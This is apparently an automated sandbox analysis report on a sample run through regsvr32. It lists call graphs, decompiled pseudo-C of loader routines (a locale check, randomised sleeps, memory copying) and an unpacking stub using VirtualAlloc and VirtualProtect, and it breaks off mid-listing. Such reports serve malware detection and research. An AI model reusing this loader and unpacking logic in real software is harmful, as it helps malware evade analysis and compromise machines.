___freetlocinfo 45 API calls 16412->16416 16417 4d8b11b 16412->16417 16415 4d84237 __setlocale_set_cat 45 API calls 16415->16391 16416->16417 16421 4d8b146 16417->16421 16424 4d882d2 RtlLeaveCriticalSection 16418->16424 16420 4d8b0e3 16420->16411 16425 4d882d2 RtlLeaveCriticalSection 16421->16425 16423 4d8b128 16423->16415 16424->16420 16425->16423 16427 4d82e2c __EH_prolog3 16426->16427 16428 4d82eb2 std::locale::_Locimp::~_Locimp 16427->16428 16429 4d825aa std::_Lockit::_Lockit RtlEnterCriticalSection 16427->16429 16428->15482 16430 4d82e40 16429->16430 16437 4d82e8f 16430->16437 16444 4d843e8 16430->16444 16431 4d825cb _tidy_global RtlLeaveCriticalSection 16431->16428 16434 4d82e69 std::locale::_Setgloballocale 16460 4d82d3a 16434->16460 16437->16431 16600 4d82f9e RtlEnterCriticalSection 16438->16600 16440 4d82102 16441 4d825cb 16440->16441 16601 4d82fa9 RtlLeaveCriticalSection 16441->16601 16443 4d82119 GetWindowsDirectoryA 16443->15488 16447 4d843f0 16444->16447 16445 4d83558 _malloc 45 API calls 16445->16447 16446 4d82e55 16446->16434 16456 4d82d7e 16446->16456 16447->16445 16447->16446 16448 4d89b8f __calloc_impl 2 API calls 16447->16448 16451 4d8440c std::locale::_Init 16447->16451 16448->16447 16453 4d83e45 __cinit 52 API calls 16451->16453 16455 4d84432 16451->16455 16453->16455 16454 4d84451 16464 4d83ece 16455->16464 16457 4d82d8a __EH_prolog3 16456->16457 16458 4d82dbd std::locale::_Locimp::~_Locimp 16457->16458 16473 4d82d57 16457->16473 16458->16434 16461 4d82d46 _strlen 16460->16461 16477 4d82cc8 16461->16477 16463 4d82d53 16463->16437 16465 4d83eea _strlen 16464->16465 16469 4d83f10 16464->16469 16466 4d83558 _malloc 45 API calls 16465->16466 16465->16469 16467 4d83efd 16466->16467 16468 4d8c0d2 _strcpy_s 45 API calls 16467->16468 16467->16469 16468->16469 16470 4d84452 16469->16470 16471 4d84479 16470->16471 16472 4d84485 RaiseException 16470->16472 16471->16472 16472->16454 16474 4d82d68 std::runtime_error::runtime_error 16473->16474 16475 4d82d3a std::_Locinfo::_Locinfo_ctor 53 API calls 16474->16475 16476 4d82d73 16475->16476 16476->16458 16478 4d82cd8 std::_Locinfo::_Locinfo_ctor 16477->16478 16479 4d82cfa 16478->16479 16480 4d82cdc 16478->16480 16499 4d82bd8 16479->16499 16486 4d82c36 16480->16486 16483 4d82cf8 std::runtime_error::runtime_error 16483->16463 16484 4d82d06 16484->16483 16508 4d826a8 16484->16508 16487 4d82c49 16486->16487 16488 4d82c4e 16486->16488 16511 4d831fb 16487->16511 16490 4d82c7c 16488->16490 16491 4d82c64 16488->16491 16492 4d82bd8 std::_Locinfo::_Locinfo_ctor 53 API calls 16490->16492 16521 4d82a7d 16491->16521 16497 4d82c84 16492->16497 16494 4d82c6e 16495 4d82a7d std::runtime_error::runtime_error 53 API calls 16494->16495 16496 4d82c7a std::runtime_error::runtime_error 16495->16496 16496->16483 16497->16496 16498 4d826a8 char_traits 45 API calls 16497->16498 16498->16496 16500 4d82bea 16499->16500 16501 4d82be5 16499->16501 16503 4d82bef 16500->16503 16506 4d82bfc 16500->16506 16553 4d8316a 16501->16553 16561 4d82aec 16503->16561 16505 4d82bfa std::runtime_error::runtime_error 16505->16484 16506->16505 16569 4d82a32 16506->16569 16591 4d84161 16508->16591 16510 4d826bc 16510->16483 16512 4d83207 __EH_prolog3 16511->16512 16513 4d82d57 std::_String_base::_Xlen 53 API calls 16512->16513 16514 4d83214 16513->16514 16527 4d8301f 16514->16527 16516 4d83224 16517 4d84452 __CxxThrowException@8 RaiseException 16516->16517 16518 4d83239 16517->16518 16531 4d831a9 16518->16531 16520 4d83246 16520->16488 16522 4d82a8c 16521->16522 16524 4d82a91 16521->16524 16523 4d831fb std::_String_base::_Xlen 53 API calls 16522->16523 16523->16524 16526 4d82ad2 std::runtime_error::runtime_error 16524->16526 16541 4d826c4 16524->16541 16526->16494 16528 4d8302b __EH_prolog3 std::runtime_error::runtime_error 16527->16528 16537 4d82ff9 16528->16537 16530 4d8304a std::locale::_Locimp::~_Locimp 16530->16516 16532 4d831b5 __EH_prolog3 16531->16532 16533 4d83ece std::exception::exception 45 API calls 16532->16533 16534 4d831c3 16533->16534 16535 4d82ff9 std::runtime_error::runtime_error 53 API calls 16534->16535 16536 4d831d9 std::locale::_Locimp::~_Locimp 16535->16536 16536->16520 16538 4d8300a std::runtime_error::runtime_error 16537->16538 16539 4d82c36 std::runtime_error::runtime_error 53 API calls 16538->16539 16540 4d83019 16539->16540 16540->16530 16544 4d841dc 16541->16544 16543 4d826d8 16543->16526 16545 4d841ea 16544->16545 16550 4d84203 16544->16550 16546 4d841ef 16545->16546 16548 4d8420f 16545->16548 16547 4d85b1f __free_osfhnd 45 API calls 16546->16547 16549 4d841f4 16547->16549 16548->16550 16551 4d85b1f __free_osfhnd 45 API calls 16548->16551 16552 4d85aa7 __getenv_s_helper 2 API calls 16549->16552 16550->16543 16551->16549 16552->16550 16554 4d83176 __EH_prolog3 16553->16554 16555 4d82d57 std::_String_base::_Xlen 53 API calls 16554->16555 16556 4d83183 16555->16556 16557 4d8301f std::runtime_error::runtime_error 53 API calls 16556->16557 16558 4d83193 16557->16558 16559 4d84452 __CxxThrowException@8 RaiseException 16558->16559 16560 4d831a8 16559->16560 16562 4d82af8 __EH_prolog3_catch 16561->16562 16573 4d828b9 16562->16573 16564 4d82b41 16566 4d826a8 char_traits 45 API calls 16564->16566 16567 4d82b93 16564->16567 16565 4d82a32 std::locale::_Locimp::~_Locimp 45 API calls 16568 4d82ba1 std::locale::_Locimp::~_Locimp std::runtime_error::runtime_error 16565->16568 16566->16567 16567->16565 16568->16505 16570 4d82a3c 16569->16570 16571 4d82a5c std::runtime_error::runtime_error 16569->16571 16570->16571 16572 4d826a8 char_traits 45 API calls 16570->16572 16571->16505 16572->16571 16574 4d828d1 16573->16574 16575 4d828c6 16573->16575 16574->16575 16576 4d828dd 16574->16576 16578 4d843e8 std::locale::_Init 53 API calls 16575->16578 16585 4d83e68 16576->16585 16580 4d828ce 16578->16580 16580->16564 16581 4d84452 __CxxThrowException@8 RaiseException 16582 4d82902 16581->16582 16583 4d83ece std::exception::exception 45 API calls 16582->16583 16584 4d8290f 16583->16584 16584->16564 16586 4d83e7d _strlen 16585->16586 16590 4d828ed 16585->16590 16587 4d83558 _malloc 45 API calls 16586->16587 16588 4d83e8c 16587->16588 16589 4d8c0d2 _strcpy_s 45 API calls 16588->16589 16588->16590 16589->16590 16590->16581 16594 4d84173 _memset 16591->16594 16596 4d8416f 16591->16596 16592 4d84178 16593 4d85b1f __free_osfhnd 45 API calls 16592->16593 16599 4d8417d 16593->16599 16594->16592 16594->16596 16597 4d841c2 16594->16597 16595 4d85aa7 __getenv_s_helper 2 API calls 16595->16596 16596->16510 16597->16596 16598 4d85b1f __free_osfhnd 45 API calls 16597->16598 16598->16599 16599->16595 16600->16440 16601->16443 16633 4d71d32 GetCurrentThread SetThreadAffinityMask 16634 4d71d55 16633->16634 16635 4d71d50 SetThreadPriority 16633->16635 16640 4d717a7 16634->16640 16635->16634 16638 4d71d64 SetThreadPriority 16639 4d71d68 16638->16639 16667 4d7146c CreateEventA 16640->16667 16642 4d717b8 16643 4d717c6 GetSystemTime SwitchToThread 16642->16643 16644 4d718c8 16642->16644 16673 4d715a3 16643->16673 16644->16638 16644->16639 16647 4d71803 16647->16644 16681 4d71c12 16647->16681 16650 4d718b9 16650->16644 16652 4d718c2 GetLastError 16650->16652 16651 4d71862 16653 4d71ca4 6 API calls 16651->16653 16652->16644 16655 4d71883 16653->16655 16657 4d718af GetLastError 16655->16657 16658 4d71889 WaitForSingleObject 16655->16658 16657->16650 16660 4d718a6 CloseHandle 16658->16660 16661 4d7189a GetExitCodeThread 16658->16661 16659 4d7182f GetLongPathNameW 16659->16651 16662 4d71844 16659->16662 16660->16650 16661->16660 16701 4d71c8f HeapAlloc 16662->16701 16664 4d7184e 16664->16651 16665 4d71857 GetLongPathNameW 16664->16665 16702 4d7136a HeapFree 16665->16702 16668 4d714d1 GetLastError 16667->16668 16669 4d7148a GetVersion 16667->16669 16670 4d71494 GetCurrentProcessId OpenProcess 16669->16670 16671 4d714cc 16669->16671 16672 4d714c1 16670->16672 16671->16642 16672->16642 16674 4d715bf 16673->16674 16675 4d716ae Sleep 16674->16675 16676 4d715ca VirtualAlloc 16674->16676 16675->16643 16675->16647 16676->16675 16677 4d7160a 16676->16677 16678 4d71695 16677->16678 16679 4d71682 memcpy 16677->16679 16680 4d7169c VirtualFree 16678->16680 16679->16680 16680->16675 16703 4d71112 16681->16703 16683 4d71810 16683->16650 16683->16651 16689 4d71d7c 16683->16689 16684 4d71c33 16684->16683 16685 4d71c78 HeapFree 16684->16685 16710 4d71566 GetLocaleInfoA 16684->16710 16685->16683 16688 4d71c73 16688->16685 16715 4d71c8f HeapAlloc 16689->16715 16691 4d71d9a 16692 4d7182b 16691->16692 16693 4d71da0 GetModuleFileNameW 16691->16693 16692->16651 16692->16659 16694 4d71db2 16693->16694 16695 4d71dd1 16693->16695 16694->16693 16694->16695 16716 4d7136a HeapFree 16694->16716 16717 4d71c8f HeapAlloc 16694->16717 16695->16692 16696 4d71de3 GetLastError 16695->16696 16700 4d71ddc 16695->16700 16718 4d7136a HeapFree 16696->16718 16700->16692 16701->16664 16702->16651 16708 4d7114f 16703->16708 16705 4d711cf 16706 4d71204 memcpy 16705->16706 16707 4d711cd 16705->16707 16706->16707 16707->16684 16708->16705 16708->16707 16713 4d71c8f HeapAlloc 16708->16713 16714 4d7136a HeapFree 16708->16714 16711 4d71585 GetSystemDefaultUILanguage VerLanguageNameA 16710->16711 16712 4d7159d StrStrIA 16710->16712 16711->16712 16712->16685 16712->16688 16713->16708 16714->16708 16715->16691 16716->16694 16717->16694 16718->16700

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                                                                    			E04D717A7(intOrPtr _a4) {
                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                    				struct _SYSTEMTIME _v44;
                                                                                                                                                                                    				char _v48;
                                                                                                                                                                                    				long _v52;
                                                                                                                                                                                    				long _v56;
                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                    				long _t21;
                                                                                                                                                                                    				int _t23;
                                                                                                                                                                                    				long _t26;
                                                                                                                                                                                    				long _t27;
                                                                                                                                                                                    				long _t31;
                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                    				intOrPtr _t44;
                                                                                                                                                                                    				signed int _t45;
                                                                                                                                                                                    				void* _t50;
                                                                                                                                                                                    				signed int _t54;
                                                                                                                                                                                    				void* _t56;
                                                                                                                                                                                    				intOrPtr* _t57;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t21 = E04D7146C();
                                                                                                                                                                                    				_v52 = _t21;
                                                                                                                                                                                    				if(_t21 != 0) {
                                                                                                                                                                                    					L18:
                                                                                                                                                                                    					return _t21;
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					goto L1;
                                                                                                                                                                                    				}
                                                                                                                                                                                    				do {
                                                                                                                                                                                    					L1:
                                                                                                                                                                                    					GetSystemTime( &_v44);
                                                                                                                                                                                    					_t23 = SwitchToThread();
                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                    					_t45 = 9;
                                                                                                                                                                                    					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
                                                                                                                                                                                    					_t26 = E04D715A3(0, _t54); // executed
                                                                                                                                                                                    					_v56 = _t26;
                                                                                                                                                                                    					Sleep(_t54 << 5); // executed
                                                                                                                                                                                    					_t21 = _v56;
                                                                                                                                                                                    				} while (_t21 == 0xc);
                                                                                                                                                                                    				if(_t21 != 0) {
                                                                                                                                                                                    					goto L18;
                                                                                                                                                                                    				}
                                                                                                                                                                                    				_t27 = E04D71C12(_t45); // executed
                                                                                                                                                                                    				_v52 = _t27;
                                                                                                                                                                                    				if(_t27 != 0) {
                                                                                                                                                                                    					L16:
                                                                                                                                                                                    					_t21 = _v52;
                                                                                                                                                                                    					if(_t21 == 0xffffffff) {
                                                                                                                                                                                    						_t21 = GetLastError();
                                                                                                                                                                                    					}
                                                                                                                                                                                    					goto L18;
                                                                                                                                                                                    				}
                                                                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                                                                    					L11:
                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                    					_t56 = E04D71CA4(E04D716EC,  &_v28);
                                                                                                                                                                                    					if(_t56 == 0) {
                                                                                                                                                                                    						_v56 = GetLastError();
                                                                                                                                                                                    					} else {
                                                                                                                                                                                    						_t31 = WaitForSingleObject(_t56, 0xffffffff);
                                                                                                                                                                                    						_v56 = _t31;
                                                                                                                                                                                    						if(_t31 == 0) {
                                                                                                                                                                                    							GetExitCodeThread(_t56,  &_v56);
                                                                                                                                                                                    						}
                                                                                                                                                                                    						CloseHandle(_t56);
                                                                                                                                                                                    					}
                                                                                                                                                                                    					goto L16;
                                                                                                                                                                                    				}
                                                                                                                                                                                    				if(E04D71D7C(_t45,  &_v48) != 0) {
                                                                                                                                                                                    					 *0x4d741b8 = 0;
                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                    				}
                                                                                                                                                                                    				_t44 = _v48;
                                                                                                                                                                                    				_t57 = __imp__GetLongPathNameW;
                                                                                                                                                                                    				_t37 =  *_t57(_t44, 0, 0); // executed
                                                                                                                                                                                    				_t50 = _t37;
                                                                                                                                                                                    				if(_t50 == 0) {
                                                                                                                                                                                    					L9:
                                                                                                                                                                                    					 *0x4d741b8 = _t44;
                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                    				}
                                                                                                                                                                                    				_t15 = _t50 + 2; // 0x2
                                                                                                                                                                                    				_t39 = E04D71C8F(_t50 + _t15);
                                                                                                                                                                                    				 *0x4d741b8 = _t39;
                                                                                                                                                                                    				if(_t39 == 0) {
                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					 *_t57(_t44, _t39, _t50); // executed
                                                                                                                                                                                    					E04D7136A(_t44);
                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                    				}
                                                                                                                                                                                    			}






















                                                                                                                                                                                    0x04d717b3
                                                                                                                                                                                    0x04d717bc
                                                                                                                                                                                    0x04d717c0
                                                                                                                                                                                    0x04d718c8
                                                                                                                                                                                    0x04d718ce
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d717c6
                                                                                                                                                                                    0x04d717c6
                                                                                                                                                                                    0x04d717cb
                                                                                                                                                                                    0x04d717d1
                                                                                                                                                                                    0x04d717e0
                                                                                                                                                                                    0x04d717e1
                                                                                                                                                                                    0x04d717e4
                                                                                                                                                                                    0x04d717e7
                                                                                                                                                                                    0x04d717f0
                                                                                                                                                                                    0x04d717f4
                                                                                                                                                                                    0x04d717fa
                                                                                                                                                                                    0x04d717fe
                                                                                                                                                                                    0x04d71805
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d7180b
                                                                                                                                                                                    0x04d71812
                                                                                                                                                                                    0x04d71816
                                                                                                                                                                                    0x04d718b9
                                                                                                                                                                                    0x04d718b9
                                                                                                                                                                                    0x04d718c0
                                                                                                                                                                                    0x04d718c2
                                                                                                                                                                                    0x04d718c2
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d718c0
                                                                                                                                                                                    0x04d7181f
                                                                                                                                                                                    0x04d71872
                                                                                                                                                                                    0x04d71872
                                                                                                                                                                                    0x04d71883
                                                                                                                                                                                    0x04d71887
                                                                                                                                                                                    0x04d718b5
                                                                                                                                                                                    0x04d71889
                                                                                                                                                                                    0x04d7188c
                                                                                                                                                                                    0x04d71894
                                                                                                                                                                                    0x04d71898
                                                                                                                                                                                    0x04d718a0
                                                                                                                                                                                    0x04d718a0
                                                                                                                                                                                    0x04d718a7
                                                                                                                                                                                    0x04d718a7
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d71887
                                                                                                                                                                                    0x04d7182d
                                                                                                                                                                                    0x04d7186c
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d7186c
                                                                                                                                                                                    0x04d7182f
                                                                                                                                                                                    0x04d71833
                                                                                                                                                                                    0x04d7183c
                                                                                                                                                                                    0x04d7183e
                                                                                                                                                                                    0x04d71842
                                                                                                                                                                                    0x04d71864
                                                                                                                                                                                    0x04d71864
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d71864
                                                                                                                                                                                    0x04d71844
                                                                                                                                                                                    0x04d71849
                                                                                                                                                                                    0x04d71850
                                                                                                                                                                                    0x04d71855
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d71857
                                                                                                                                                                                    0x04d7185a
                                                                                                                                                                                    0x04d7185d
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d7185d

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 04D7146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,04D717B8,74B063F0,00000000), ref: 04D7147B
                                                                                                                                                                                      • Part of subcall function 04D7146C: GetVersion.KERNEL32 ref: 04D7148A
                                                                                                                                                                                      • Part of subcall function 04D7146C: GetCurrentProcessId.KERNEL32 ref: 04D71499
                                                                                                                                                                                      • Part of subcall function 04D7146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04D714B2
                                                                                                                                                                                    • GetSystemTime.KERNEL32(?,74B063F0,00000000), ref: 04D717CB
                                                                                                                                                                                    • SwitchToThread.KERNEL32 ref: 04D717D1
                                                                                                                                                                                      • Part of subcall function 04D715A3: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 04D715F9
                                                                                                                                                                                      • Part of subcall function 04D715A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,04D717EC), ref: 04D7168B
                                                                                                                                                                                      • Part of subcall function 04D715A3: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 04D716A6
                                                                                                                                                                                    • Sleep.KERNELBASE(00000000,00000000), ref: 04D717F4
                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 04D7183C
                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 04D7185A
                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,04D716EC,?,00000000), ref: 04D7188C
                                                                                                                                                                                    • GetExitCodeThread.KERNEL32(00000000,?), ref: 04D718A0
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04D718A7
                                                                                                                                                                                    • GetLastError.KERNEL32(04D716EC,?,00000000), ref: 04D718AF
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 04D718C2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477268692.0000000004D71000.00000020.00020000.sdmp, Offset: 04D70000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.477251556.0000000004D70000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477283650.0000000004D73000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477296193.0000000004D75000.00000004.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477312335.0000000004D76000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d70000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2280543912-0
                                                                                                                                                                                    • Opcode ID: 3c5deb353565775252a16cead2ae3b9cafaf9b09c5d391c2f7088f0c83195b66
                                                                                                                                                                                    • Instruction ID: 92e0c701253946c941f2cc9f211291e133e74541b66c0889f60558acac1db0e5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c5deb353565775252a16cead2ae3b9cafaf9b09c5d391c2f7088f0c83195b66
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E316171A04711ABD721EF65984896FBBECFB85654F140B2AF855C2340FB38E904DBB2
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 80 4de2668-4de26b4 82 4de26be-4de26c4 80->82 83 4de26b6-4de26bc 80->83 85 4de26c9-4de26ce 82->85 84 4de26dd-4de2705 83->84 88 4de2746-4de280c VirtualAlloc call 4de23c6 call 4de2396 VirtualAlloc call 4de231e VirtualFree 84->88 89 4de2707-4de2709 84->89 86 4de26d7 85->86 87 4de26d0-4de26d5 85->87 86->84 87->85 97 4de280e-4de2828 call 4de23c6 88->97 98 4de2829-4de2835 88->98 89->88 91 4de270b-4de2742 VirtualAlloc 89->91 91->88 97->98 100 4de283c 98->100 101 4de2837-4de283a 98->101 103 4de283f-4de285a call 4de2396 100->103 101->103 106 4de285c-4de286f call 4de2275 103->106 107 4de2874-4de28a3 103->107 106->107 109 4de28b9-4de28c4 107->109 110 4de28a5-4de28b3 107->110 112 4de28df-4de28fc VirtualProtect 109->112 113 4de28c6-4de28cf 109->113 110->109 111 4de28b5 110->111 111->109 115 4de28fe-4de290a 112->115 116 4de2931-4de29e8 call 4de24f8 call 4de248a call 4de252e VirtualProtect 112->116 113->112 114 4de28d1-4de28d9 113->114 114->112 118 4de28db 114->118 119 4de290c-4de2923 VirtualProtect 115->119 127 4de29ee-4de2a13 116->127 118->112 121 4de2927-4de292f 119->121 122 4de2925 119->122 121->116 121->119 122->121 128 4de2a1c 127->128 129 4de2a15-4de2a1a 127->129 130 4de2a21-4de2a2c 128->130 129->130 131 4de2a2e 130->131 132 4de2a31-4de2a49 VirtualProtect 130->132 131->132 132->127 133 4de2a4b-4de2a72 VirtualFree GetPEB 132->133 134 4de2a77-4de2a7e 133->134 135 4de2a84-4de2a9e 134->135 136 4de2a80 134->136 138 4de2aa1-4de2aca call 4de259e call 4de2acf 135->138 136->134 137 4de2a82 136->137 137->138
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,000009F8,00003000,00000040,000009F8,04DE20C0), ref: 04DE2722
                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000034,00003000,00000040,04DE2121), ref: 04DE2759
                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,0000BFC3,00003000,00000040), ref: 04DE27B9
                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04DE27EF
                                                                                                                                                                                    • VirtualProtect.KERNEL32(04D70000,00000000,00000004,04DE2647), ref: 04DE28F4
                                                                                                                                                                                    • VirtualProtect.KERNEL32(04D70000,00001000,00000004,04DE2647), ref: 04DE291B
                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,?,00000002,04DE2647), ref: 04DE29E8
                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,?,00000002,04DE2647,?), ref: 04DE2A3E
                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04DE2A5A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477466799.0000000004DE2000.00000040.00020000.sdmp, Offset: 04DE2000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4de2000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2574235972-0
                                                                                                                                                                                    • Opcode ID: 60c54791a7db6562afa80eab81358fde0908a34fd58b877f97c248b394c3acce
                                                                                                                                                                                    • Instruction ID: 12afb695525e8216abe2b4dc57fc5e4a67ae4db6b1ee870aa5dd6c4c5727c2a0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 60c54791a7db6562afa80eab81358fde0908a34fd58b877f97c248b394c3acce
                                                                                                                                                                                    • Instruction Fuzzy Hash: ABD14772201202DFDB359F15C880BB277BAFF48314B1941B8ED099FA5AD778B851DB60
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 204 4d71566-4d71583 GetLocaleInfoA 205 4d71585-4d71598 GetSystemDefaultUILanguage VerLanguageNameA 204->205 206 4d7159d-4d715a2 204->206 205->206
                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                    			E04D71566(void* __ecx) {
                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                    				signed short _t7;
                                                                                                                                                                                    
                                                                                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                    				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
                                                                                                                                                                                    				if(_t7 == 0) {
                                                                                                                                                                                    					__imp__GetSystemDefaultUILanguage();
                                                                                                                                                                                    					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
                                                                                                                                                                                    				}
                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                    			}





                                                                                                                                                                                    0x04d7156a
                                                                                                                                                                                    0x04d7157b
                                                                                                                                                                                    0x04d71583
                                                                                                                                                                                    0x04d71585
                                                                                                                                                                                    0x04d71598
                                                                                                                                                                                    0x04d71598
                                                                                                                                                                                    0x04d715a2

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,04D71C5E,?,04D71810,?,00000000,00000000,?,?,?,04D71810), ref: 04D7157B
                                                                                                                                                                                    • GetSystemDefaultUILanguage.KERNEL32(?,?,04D71C5E,?,04D71810,?,00000000,00000000,?,?,?,04D71810), ref: 04D71585
                                                                                                                                                                                    • VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,04D71C5E,?,04D71810,?,00000000,00000000,?,?,?,04D71810), ref: 04D71598
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477268692.0000000004D71000.00000020.00020000.sdmp, Offset: 04D70000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.477251556.0000000004D70000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477283650.0000000004D73000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477296193.0000000004D75000.00000004.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477312335.0000000004D76000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d70000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Language$DefaultInfoLocaleNameSystem
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3724080410-0
                                                                                                                                                                                    • Opcode ID: d06544de00a3bfbabd355014deb1b6aad50b18845ee314cb502836f062f7996d
                                                                                                                                                                                    • Instruction ID: 0e3ab9eaea6e98ad4f8b888b05d052a0886a6fe9761e2d1cf70034b31462fe2e
                                                                                                                                                                                    • Opcode Fuzzy Hash: d06544de00a3bfbabd355014deb1b6aad50b18845ee314cb502836f062f7996d
                                                                                                                                                                                    • Instruction Fuzzy Hash: F6E0B864740245B6E714EB919D0AF7D7278E70074AF500154FB41E61C0E6749E04E775
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: r
                                                                                                                                                                                    • API String ID: 0-1812594589
                                                                                                                                                                                    • Opcode ID: 75f0ffa8da374f72415f862e915289236307c495441d1f5bbfdf291d6ebc7f52
                                                                                                                                                                                    • Instruction ID: 68941b6cfefa81b078c8f88a1e45dedae00db29a1bcc24342c3ed69bff5977b1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 75f0ffa8da374f72415f862e915289236307c495441d1f5bbfdf291d6ebc7f52
                                                                                                                                                                                    • Instruction Fuzzy Hash: 89A2F371B04215CFD315EF2AE4A06A977F9FB88304F0985AED4498B382E678AD4DCF51
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNELBASE(04DDE534,?,04D83AFF), ref: 04D8B1CA
                                                                                                                                                                                    • __mtterm.LIBCMT ref: 04D8B1D6
